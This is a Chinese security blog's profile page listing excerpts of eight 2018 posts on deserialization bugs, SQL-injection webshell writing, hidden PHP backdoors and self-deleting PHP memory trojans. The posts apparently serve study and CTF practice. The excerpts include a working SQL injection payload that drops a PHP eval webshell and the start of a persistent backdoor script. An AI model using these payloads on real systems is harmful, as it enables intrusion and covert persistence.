自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(8)
  • 收藏
  • 关注

原创 (Java)XMLDecoder反序列化漏洞

基本概念XMLDecoder用于将XMLEncoder创建的xml文档内容反序列化为一个Java对象,其位于java.beans包下。 影响版本XMLDecoder在JDK 1.4~JDK 11中都存在反序列化漏洞安全风险。 Demoimport com.sun.beans.decoder.DocumentHandler;import org.xml.sax.hel...

2018-12-17 22:46:46 5224

原创 (Python)cPickle反序列化漏洞

基本概念Python中有个库可以实现序列化和反序列化操作,名为pickle或cPickle,作用和PHP的serialize与unserialize一样,两者只是实现的语言不同,一个是纯Python实现、另一个是C实现,函数调用基本相同,但cPickle库的性能更好,因此这里选用cPickle库作为示例。cPickle可以对任意一种类型的Python对象进行序列化操作。下面是主要的四个函数...

2018-12-15 17:04:26 3662

原创 (Python)PyYAML反序列化漏洞

基本概念(引用百度)YAML是“YAML不是一种标记语言”的外语缩写;但为了强调这种语言以数据做为中心,而不是以置标语言为重点,而用返璞词重新命名。它是一种直观的能够被电脑识别的数据序列化格式,是一个可读性高并且容易被人类阅读,容易和脚本语言交互,用来表达资料序列的编程语言。PyYAML是Python中YAML语言的编辑器和解释器。安装:pip install PyYAML两个函数...

2018-12-15 14:00:26 3417 1

原创 SQL注入写WebShell方式小结

这里小结一下通过SQL注入写入WebShell的方法。传统的SQL语句写shell通过SQL注入select into outfile实现,如:1' union select 1,'<?php eval($_POST[a]);?>' INTO OUTFILE '/var/www/tmp/nb.php'#sqlmap写shell前提都是需要对目标目录具有写权限。-...

2018-12-09 11:08:43 20906

原创 Windows下的一种PHP隐蔽后门姿势

在Windows中的PHP解释环境中有两个函数能够自动加载文件,即auto_prepend_file和auto_append_file,其在php.ini中可修改成任意文件,可为PHP或DLL文件。将后门代码写入这两个文件,再修改include_path为后门文件的绝对路径,则Web站点下所有的PHP文件都可以作为PHP后门。1、修改auto_prepend_file和auto_append_...

2018-12-09 10:58:27 1772 2

原创 PHP内存型木马

基本概念PHP内存性木马即PHP不死马,一般会删除自身以进程的形式循环创建隐蔽的后门。通常在AWD Web题中用得较多。Demo及原理nodie.php<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '/var/www/dvwa/.ski12.php'; $...

2018-12-09 10:45:42 7833 1

原创 Linux环境与相关工具

这里小结一下Linux二进制分析相关的环境与工具的基础知识。Linux工具Linux自带了很多常用的binutils工具,这些工具可在http://www.gnu.org/software/binutils/中找到,其中包含许多用于二进制分析和破解的工具。GDBGNU Debuger,具体的不用多说。GNU binutils中的objdumpobject dump是一种对代...

2018-12-08 21:45:13 771

原创 PHP反序列化漏洞

序列化与反序列化通常我们定义了一个类的对象,其中保存了一些属性值,为了方便下次可以继续使用在这个对象或者在其他的文件中可以使用该对象,于是就可以调用serialize()函数将该对象序列化为字符串的形式,将该字符串保存起来,等到需要使用该对象时只需将该字符串传过去并调用unserialize()函数对其反序列化即可。serialize():将一个对象转成字符串形式,方便保存以便于下次再次反...

2018-12-08 18:13:02 1077

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除